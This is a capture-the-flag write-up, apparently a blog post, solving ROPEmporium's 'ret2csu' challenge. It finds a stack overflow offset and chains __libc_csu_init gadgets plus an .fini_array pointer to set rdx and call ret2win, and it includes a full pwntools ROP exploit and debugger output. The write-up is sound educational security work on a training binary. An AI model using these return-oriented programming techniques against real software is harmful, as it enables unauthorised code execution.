In this post, I will be explaining my solution for the Ret2CSU challenge from ROPEmporium. The challenge can be found here: https://ropemporium.com/challenge/ret2csu.html

ROPEmporium challenges are awesome for learning Return Oriented Programming (ROP) with small and fairly easy-to-analyse binaries. Ret2CSU is the 8th and (currently) final stage of ROPEmporium and involves a binary with no custom ROP gadgets added to it. You have to work with the "attached code" added to the binary by the compiler, and your goal is to execute the ret2win function.

Here are some tools I recommend for these types of binary challenges:

  • GDB with the PEDA extension (for debugging)
  • objdump (for disassembling and finding symbol addresses)
  • readelf (for looking at the ELF header and symbols)
  • pwntools python library (for creating exploits)
  • ROPgadget (for finding ROP gadgets available in the binary)

In the challenge, we are provided a flag.txt file and the executable to compromise (named ret2csu). Let's run file on it to make sure it's what we expect:

# file ret2csu 
ret2csu: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a799b370a24ba0109f1175f31b3058094b5feab5, not stripped

OK cool! So it's a 64-bit, dynamically linked ELF executable. The symbols also haven't been stripped, which is nice :)

Next we can execute it in a sandbox environment and see what happens:

# ./ret2csu 
ret2csu by ROP Emporium

Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

> 

The executable just prints out some text and asks us to call ret2win, making sure the third argument to it (which is in rdx) is equal to 0xdeadcafebabebeef.

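Note that there's a great reference for 64-bit syscalls here: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/. This site shows that parameters are passed in using the following registers: RDI, then RSI, then RDX. Ordinary function calls on x86-64 Linux use the same first three registers, which is why the third argument to ret2win lives in RDX.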

Let's also run checksec on the binary (provided with GDB PEDA) to see what protections it has:

# gdb ret2csu -q
Reading symbols from ret2csu...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Above we can see that NX is enabled (hence we have to use ROP), CANARY is disabled (so we don't have to bypass a stack canary), and PIE is disabled (so we know the addresses of the binary itself are predictable). Next, as we know this is a buffer overflow challenge, we can run the binary with GDB and provide a large value as the input to see what happens:

# gdb ret2csu -q
Reading symbols from ret2csu...(no debugging symbols found)...done.
gdb-peda$ pattern create 500
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
gdb-peda$ r
Starting program: /root/Documents/hackthebox/ropemporium/ret2csu/ret2csu 
ret2csu by ROP Emporium

Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A

I created a unique pattern with pattern create and then sent it to the program. The program crashes straight away and GDB PEDA shows me the following output:

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x601038 --> 0x0 
RBX: 0x0 
RCX: 0xfbad2288 
RDX: 0x7fffffffe0d0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
RSI: 0x7ffff7f998d0 --> 0x0 
RDI: 0x0 
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffe0f8 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
RIP: 0x4007b0 (:	ret)
R8 : 0x0 
R9 : 0x7ffff7f9e500 (0x00007ffff7f9e500)
R10: 0x602010 --> 0x0 
R11: 0x246 
R12: 0x4005f0 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe1e0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4007a7 :	mov    rdi,0x0
   0x4007ae :	nop
   0x4007af :	leave  
=> 0x4007b0 :	ret    
   0x4007b1 :	push   rbp
   0x4007b2 :	mov    rbp,rsp
   0x4007b5 :	sub    rsp,0x30
   0x4007b9 :	mov    DWORD PTR [rbp-0x24],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe0f8 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0008| 0x7fffffffe100 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0016| 0x7fffffffe108 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0024| 0x7fffffffe110 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0032| 0x7fffffffe118 ("IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0040| 0x7fffffffe120 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0048| 0x7fffffffe128 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0056| 0x7fffffffe130 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004007b0 in pwnme ()

The crash occurs as the program executes ret, which pops the top 8 bytes off the stack and jumps to that address. As the top of the stack holds part of our unique pattern, which is not a valid address, the program crashes with a segfault. So let's find the offset of the top of the stack:

gdb-peda$ pattern offset AA0AAFAAbAA
AA0AAFAAbAA found at offset: 40
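
As a quick sanity check on that offset, the sketch below looks up the crash-dump values in the start of the pattern using only the Python standard library. The variable names are my own; the pattern prefix, the RBP value and the RSP string are copied from the output above.

```python
import struct

# First 64 characters of the PEDA pattern that was sent to the program.
pattern_prefix = "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH"

# RBP from the crash dump, turned back into the 8 bytes it was loaded from
# (x86-64 is little-endian, hence "<Q").
saved_rbp = struct.pack("<Q", 0x6141414541412941).decode("ascii")

rbp_offset = pattern_prefix.index(saved_rbp)       # where the saved RBP sits
ret_offset = pattern_prefix.index("AA0AAFAAbAA")   # where the return address sits

print(saved_rbp, rbp_offset, ret_offset)
```

The saved RBP lands 8 bytes before the return address, which matches a 32-byte buffer followed by the saved frame pointer and then the return address at offset 40.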

Great! Now we can create a sample python exploit and test whether we can control the flow of the application at this offset. Below, I use pwntools to create a template for my exploit code:

# pwn template ret2csu > exploit.py

The above line creates a Python script with some nice template code (run chmod +x exploit.py to make it executable), with features such as:

  • creating a pwntools process object to allow us to interact with the process
  • parsing arguments to enable or disable remote GDB debugging
  • automatically running checksec on the binary and putting the result in a comment in our exploit

Now to get to our actual ROP chain! Let's find the addresses of the symbols and gadgets we need! First, we need the address of the ret2win function. We can use objdump to help us with this:

# objdump -D ret2csu -M intel | grep ret2win
00000000004007b1 <ret2win>:

Note that I disassembled all sections in the binary using -D and asked for the output to be in intel syntax using -M intel. Next, we can use ROPgadget to find gadgets. We know that we want to control the value in RDX, so we can look for any instructions with pop or rdx in them:

# ROPgadget --binary ret2csu | grep pop
<---------snipped output--------->
0x000000000040089c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# ROPgadget --binary ret2csu | grep rdx
0x0000000000400567 : lea ecx, dword ptr [rdx] ; and byte ptr [rax], al ; test rax, rax ; je 0x40057b ; call rax
0x000000000040056d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret

We have a really nice gadget for controlling the registers R12, R13, R14 and R15; however, we don't have any nice gadgets for controlling what goes into rdx.

Using objdump -D ret2csu -M intel we find that the above pop gadget is actually part of the <__libc_csu_init> function, and has a few more pop instructions before it:

  40089a:	5b                   	pop    rbx
  40089b:	5d                   	pop    rbp
  40089c:	41 5c                	pop    r12
  40089e:	41 5d                	pop    r13
  4008a0:	41 5e                	pop    r14
  4008a2:	41 5f                	pop    r15
  4008a4:	c3                   	ret

This must be the section the challenge title is referring to! So we look for other code in this section which we may be able to use to control RDX, and we find the following interesting code:

  400880:	4c 89 fa             	mov    rdx,r15
  400883:	4c 89 f6             	mov    rsi,r14
  400886:	44 89 ef             	mov    edi,r13d
  400889:	41 ff 14 dc          	call   QWORD PTR [r12+rbx*8]

The above gadget, also found in the CSU section, uses the registers we control ( r12,r13,r14,r15 ) in mov instructions and a call instruction. This is great! We can treat the call like a jmp instruction as long as we control the contents of r12 and rbx, where the address jumped to is calculated as follows: ptr ( r12 + rbx * 8)

As part of the first mov instruction, we see that the value in r15 is copied into rdx. This means we can use our first gadget to pop a value of our choice into r15 and then use the second gadget to copy this value into rdx!
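
To make the data flow between the two gadgets concrete, here is a minimal Python model of them. It is only a sketch: the function names and the dictionary of registers are my own invention, and the stack is modelled as a plain list of 64-bit values.

```python
def pop_gadget(stack, regs):
    """Model of 0x40089a: pop rbx, rbp, r12, r13, r14, r15, then ret."""
    for name in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
        regs[name] = stack.pop(0)
    return stack.pop(0)  # ret: the next address to execute


def mov_gadget(regs):
    """Model of 0x400880: mov rdx,r15 ; mov rsi,r14 ; mov edi,r13d."""
    regs["rdx"] = regs["r15"]
    regs["rsi"] = regs["r14"]
    regs["rdi"] = regs["r13"] & 0xFFFFFFFF  # writing edi zero-extends into rdi


regs = {}
# Six values for the pops, then the address of the mov/call gadget.
stack = [0, 0, 0, 0, 0, 0xdeadcafebabebeef, 0x400880]

next_rip = pop_gadget(stack, regs)
mov_gadget(regs)
print(hex(next_rip), hex(regs["rdx"]))
```

Note that only the low 32 bits of r13 reach rdi, which does not matter here because the challenge only checks rdx.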

OK we're getting somewhere. Let's set up our initial payload to set RDX to the value we want and set all other registers to 0x00:

io = start()

# mov r15 -> rdx, mov r14 -> rsi, mov r13d -> edi, call ptr(r12 + rbx*8)
movAndCall = p64(0x400880)
# pop in the following order: rbx, rbp, r12, r13, r14, r15
popAllRegisters = p64(0x40089a)
ret2win = p64(0x04007b1)
valueForRdx = p64(0xdeadcafebabebeef)

# bytes literal so the payload also builds under Python 3
initial = b"A"*40
payload = initial + popAllRegisters + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + valueForRdx + movAndCall

io.send(payload)
open('output','wb').write(payload)

io.interactive()

As we have set r12 and rbx to 0x00, we expect the program to crash when it tries to execute call [0x00]. To help test my payload, I've also added the second last line to output my payload to a file. I can then easily pass my payload to the application from within GDB. After running ./exploit.py, I have a file named output in my folder, and I run the application in GDB as follows:

# gdb ret2csu -q
Reading symbols from ret2csu...(no debugging symbols found)...done.
gdb-peda$ r < output
Starting program: ret2csu < output
ret2csu by ROP Emporium
Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

>
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x601038 --> 0x0
RBX: 0x0
RCX: 0xfbad2098
RDX: 0xdeadcafebabebeef
RSI: 0x0
RDI: 0x0
RBP: 0x0
RSP: 0x7fffffffe138 --> 0x5d2334019ad6ff00
RIP: 0x400889 (<__libc_csu_init+73>:	call   QWORD PTR [r12+rbx*8])
R8 : 0x0
R9 : 0x77 ('w')
R10: 0x602010 --> 0x0
R11: 0x246
R12: 0x0
R13: 0x0
R14: 0x0
R15: 0xdeadcafebabebeef
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400880 <__libc_csu_init+64>:	mov    rdx,r15
0x400883 <__libc_csu_init+67>:	mov    rsi,r14
0x400886 <__libc_csu_init+70>:	mov    edi,r13d
=> 0x400889 <__libc_csu_init+73>:	call   QWORD PTR [r12+rbx*8]
0x40088d <__libc_csu_init+77>:	add    rbx,0x1
0x400891 <__libc_csu_init+81>:	cmp    rbp,rbx
0x400894 <__libc_csu_init+84>:	jne    0x400880 <__libc_csu_init+64>
0x400896 <__libc_csu_init+86>:	add    rsp,0x8
Guessed arguments:
arg[0]: 0x0
arg[1]: 0x0
arg[2]: 0xdeadcafebabebeef
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe138 --> 0x5d2334019ad6ff00
0008| 0x7fffffffe140 --> 0x4005f0 (<_start>:	xor    ebp,ebp)
0016| 0x7fffffffe148 --> 0x7fffffffe1e0 --> 0x1
0024| 0x7fffffffe150 --> 0x0
0032| 0x7fffffffe158 --> 0x0
0040| 0x7fffffffe160 --> 0xa2dccb7e4876ffdc
0048| 0x7fffffffe168 --> 0xa2dcdb418af0ffdc
0056| 0x7fffffffe170 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400889 in __libc_csu_init ()

OK great! We have a successful crash as predicted at 0x400889! We can also see that the values of our registers r12 and rbx are set to 0x0.

Here is the tricky bit of this challenge. I mistakenly tried putting the address of ret2win in r12 and keeping 0x0 in rbx, assuming that the call would jump to ret2win. This was an incorrect assumption: the call instruction first reads the 8-byte value stored at the calculated address and then jumps to that value.
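
To see why this fails, here is a rough sketch of what the call actually reads when r12 holds the address of ret2win. The byte string is my assumption of the standard encodings of the first three instructions seen at 0x4007b1 in the earlier crash dump (push rbp ; mov rbp,rsp ; sub rsp,0x30), and read_qword is a helper made up for this illustration.

```python
ret2win_addr = 0x4007b1
# Assumed machine code for: push rbp ; mov rbp,rsp ; sub rsp,0x30
ret2win_code = bytes.fromhex("55" "4889e5" "4883ec30")


def read_qword(blob, base, address):
    """Read 8 little-endian bytes from blob, which is mapped at base."""
    start = address - base
    return int.from_bytes(blob[start:start + 8], "little")


r12, rbx = ret2win_addr, 0
# call QWORD PTR [r12+rbx*8] jumps to the value stored AT that address.
target = read_qword(ret2win_code, ret2win_addr, r12 + rbx * 8)
print(hex(target))
```

The value the CPU would jump to is just the function's own opcode bytes interpreted as a number, not ret2win itself.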

Being stuck here for a bit, I thought about placing the address of ret2win on the stack and the address of the stack in r12, which should dereference correctly, but didn't find any useful gadget for doing this. The alternative is to find a location in the binary which points to another location in the codebase, and continue execution from there.

Disassembling all sections again and looking through for pointers to code (which I know lives at addresses just above 0x400000), I find some interesting parts added by the compiler again:

Disassembly of section .init_array:

0000000000600e10 <__frame_dummy_init_array_entry>:
  600e10:	d0 06                	rol    BYTE PTR [rsi],1
  600e12:	40 00 00             	add    BYTE PTR [rax],al
  600e15:	00 00                	add    BYTE PTR [rax],al
	...

Disassembly of section .fini_array:

0000000000600e18 <__do_global_dtors_aux_fini_array_entry>:
  600e18:	a0                   	.byte 0xa0
  600e19:	06                   	(bad)  
  600e1a:	40 00 00             	add    BYTE PTR [rax],al
  600e1d:	00 00                	add    BYTE PTR [rax],al

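Looks like at 0x600e10 I have the address 0x4006d0 and at 0x600e18 I have the address 0x4006a0. (objdump -D decodes these data bytes as if they were instructions, so only the raw bytes matter here: read little-endian, d0 06 40 00 is 0x4006d0.) So if I set r12 to either of these pointers, I should be able to get to these addresses. Let's have a look at the code at these addresses: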

00000000004006a0 <__do_global_dtors_aux>:
  4006a0:	80 3d d1 09 20 00 00 	cmp    BYTE PTR [rip+0x2009d1],0x0        # 601078 <completed.7696>
  4006a7:	75 17                	jne    4006c0 <__do_global_dtors_aux+0x20>
  4006a9:	55                   	push   rbp
  4006aa:	48 89 e5             	mov    rbp,rsp
  4006ad:	e8 7e ff ff ff       	call   400630 <deregister_tm_clones>
  4006b2:	c6 05 bf 09 20 00 01 	mov    BYTE PTR [rip+0x2009bf],0x1        # 601078 <completed.7696>
  4006b9:	5d                   	pop    rbp
  4006ba:	c3                   	ret    
  4006bb:	0f 1f 44 00 00       	nop    DWORD PTR [rax+rax*1+0x0]
  4006c0:	f3 c3                	repz ret 
  4006c2:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]
  4006c6:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
  4006cd:	00 00 00 

00000000004006d0 <frame_dummy>:
  4006d0:	55                   	push   rbp
  4006d1:	48 89 e5             	mov    rbp,rsp
  4006d4:	5d                   	pop    rbp
  4006d5:	eb 89                	jmp    400660 <register_tm_clones>

These are more functions placed into the binary by the compiler! If we treat them as functions in their own right, we can expect them to end in a ret, which should return us into <__libc_csu_init> right after our call. The call instruction automatically pushes the address of the next instruction onto the stack, so if either of these functions ends in a ret, execution continues within <__libc_csu_init>.
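
The indirect call and the return path can be modelled in a few lines of Python. This is only a sketch with made-up helper names; the pointer slot and addresses are the ones from the disassembly above, and the body of the called function is skipped entirely.

```python
# Pointer slot found in .fini_array and the function it points to.
memory = {0x600e18: 0x4006a0}  # -> __do_global_dtors_aux


def call_indirect(r12, rbx, return_address, stack):
    """Model of: call QWORD PTR [r12+rbx*8]."""
    stack.append(return_address)   # call pushes the address of the next instruction
    return memory[r12 + rbx * 8]   # then jumps to the pointer stored in the slot


def ret(stack):
    """Model of: ret (pop the return address and jump to it)."""
    return stack.pop()


stack = []
rip_after_call = call_indirect(0x600e18, 0, 0x40088d, stack)
rip_after_ret = ret(stack)
print(hex(rip_after_call), hex(rip_after_ret))
```

As long as the called function leaves the stack balanced, its ret lands on 0x40088d, the instruction directly after the call.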

So as long as this works, the following code should be executed after our call:

  400889:	41 ff 14 dc          	call   QWORD PTR [r12+rbx*8]
  40088d:	48 83 c3 01          	add    rbx,0x1
  400891:	48 39 dd             	cmp    rbp,rbx
  400894:	75 ea                	jne    400880 <__libc_csu_init+0x40>
  400896:	48 83 c4 08          	add    rsp,0x8
  40089a:	5b                   	pop    rbx
  40089b:	5d                   	pop    rbp
  40089c:	41 5c                	pop    r12
  40089e:	41 5d                	pop    r13
  4008a0:	41 5e                	pop    r14
  4008a2:	41 5f                	pop    r15
  4008a4:	c3                   	ret    

It looks like after our call, rbx is incremented and compared with rbp; as long as the compare sets the zero flag, the jne is not taken and execution falls through to our first gadget. Conveniently, that gadget ends with a ret, allowing us to finally pass control to ret2win after having set RDX to the value we wanted.

Now all we need to do is make sure the cmp instruction compares two equal values. It looks like 0x01 is added to rbx and then compared to rbp. Since we control both these registers from our first gadget, we can just set these to 0x00 and 0x01 respectively and continue execution past the jne instruction.
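
The check can be written out as a tiny Python model (the function name is mine, purely for illustration):

```python
def falls_through(rbx, rbp):
    """Model of: add rbx,0x1 ; cmp rbp,rbx ; jne 0x400880."""
    rbx = (rbx + 1) & 0xFFFFFFFFFFFFFFFF  # 64-bit register arithmetic
    return rbp == rbx  # equal -> zero flag set -> jne not taken


good = falls_through(rbx=0, rbp=1)  # rbx = 0x00, rbp = 0x01
bad = falls_through(rbx=0, rbp=0)   # both registers left at 0x00
print(good, bad)
```

With rbp left at 0x00, the jne would be taken and the mov/call gadget would run again with rbx equal to 1.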

So our final payload becomes:

io = start()

# mov r15 -> rdx, mov r14 -> rsi, mov r13d -> edi, call ptr(r12 + rbx*8)
movAndCall = p64(0x400880)
# pop in the following order: rbx, rbp, r12, r13, r14, r15
popAllRegisters = p64(0x40089a)
ret2win = p64(0x04007b1)
valueForRdx = p64(0xdeadcafebabebeef)
valueForR12 = p64(0x600e18)

# bytes literal so the payload also builds under Python 3
initial = b"A"*40
payload = initial + popAllRegisters + p64(0) + p64(1) + valueForR12 + p64(0) + p64(0) + valueForRdx + movAndCall
payload += p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + ret2win

io.send(payload)
open('output','wb').write(payload)

io.interactive()

Our payload includes the initial 40 bytes of junk, followed by the address of our first gadget, which pops 6 registers. We set rbx to 0x00, rbp to 0x01, r12 to one of the pointers we found, r13 and r14 to whatever, and r15 to the special challenge value. Then the second gadget ( movAndCall ) runs, and execution continues past the call to add rsp, 0x08 followed by 6 pops and a ret. So we place seven 64-bit values on the stack (one skipped by the add, six popped) and ret to our ret2win address :)
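
For reference, the layout of the payload can be printed with nothing but the standard library. This is a sketch rather than the exploit itself: the local p64 is a stand-in for the pwntools function of the same name (8 little-endian bytes), and the labels are my own.

```python
import struct


def p64(value):
    """Stand-in for pwntools' p64: pack as 8 little-endian bytes."""
    return struct.pack("<Q", value)


layout = [
    ("padding up to the return address", b"A" * 40),
    ("pop gadget", p64(0x40089a)),
    ("rbx", p64(0)),
    ("rbp", p64(1)),
    ("r12 (pointer slot)", p64(0x600e18)),
    ("r13", p64(0)),
    ("r14", p64(0)),
    ("r15 (copied into rdx)", p64(0xdeadcafebabebeef)),
    ("mov/call gadget", p64(0x400880)),
    ("filler for add rsp,8 and 6 pops", p64(0) * 7),
    ("ret2win", p64(0x4007b1)),
]

payload = b""
for label, chunk in layout:
    print(f"{len(payload):3d}  {label}")  # byte offset of each piece
    payload += chunk
print(len(payload))
```

Printing the offsets this way makes it easy to compare the payload against the stack view in GDB when something does not line up.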

# ./exploit.py
[*] 'ret2csu'
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
[+] Starting local process 'ret2csu': pid 10496
[*] Switching to interactive mode
$
ROPE{a_placeholder_32byte_flag!}

And that's our flag!

Many thanks to the challenge creator for helping me learn!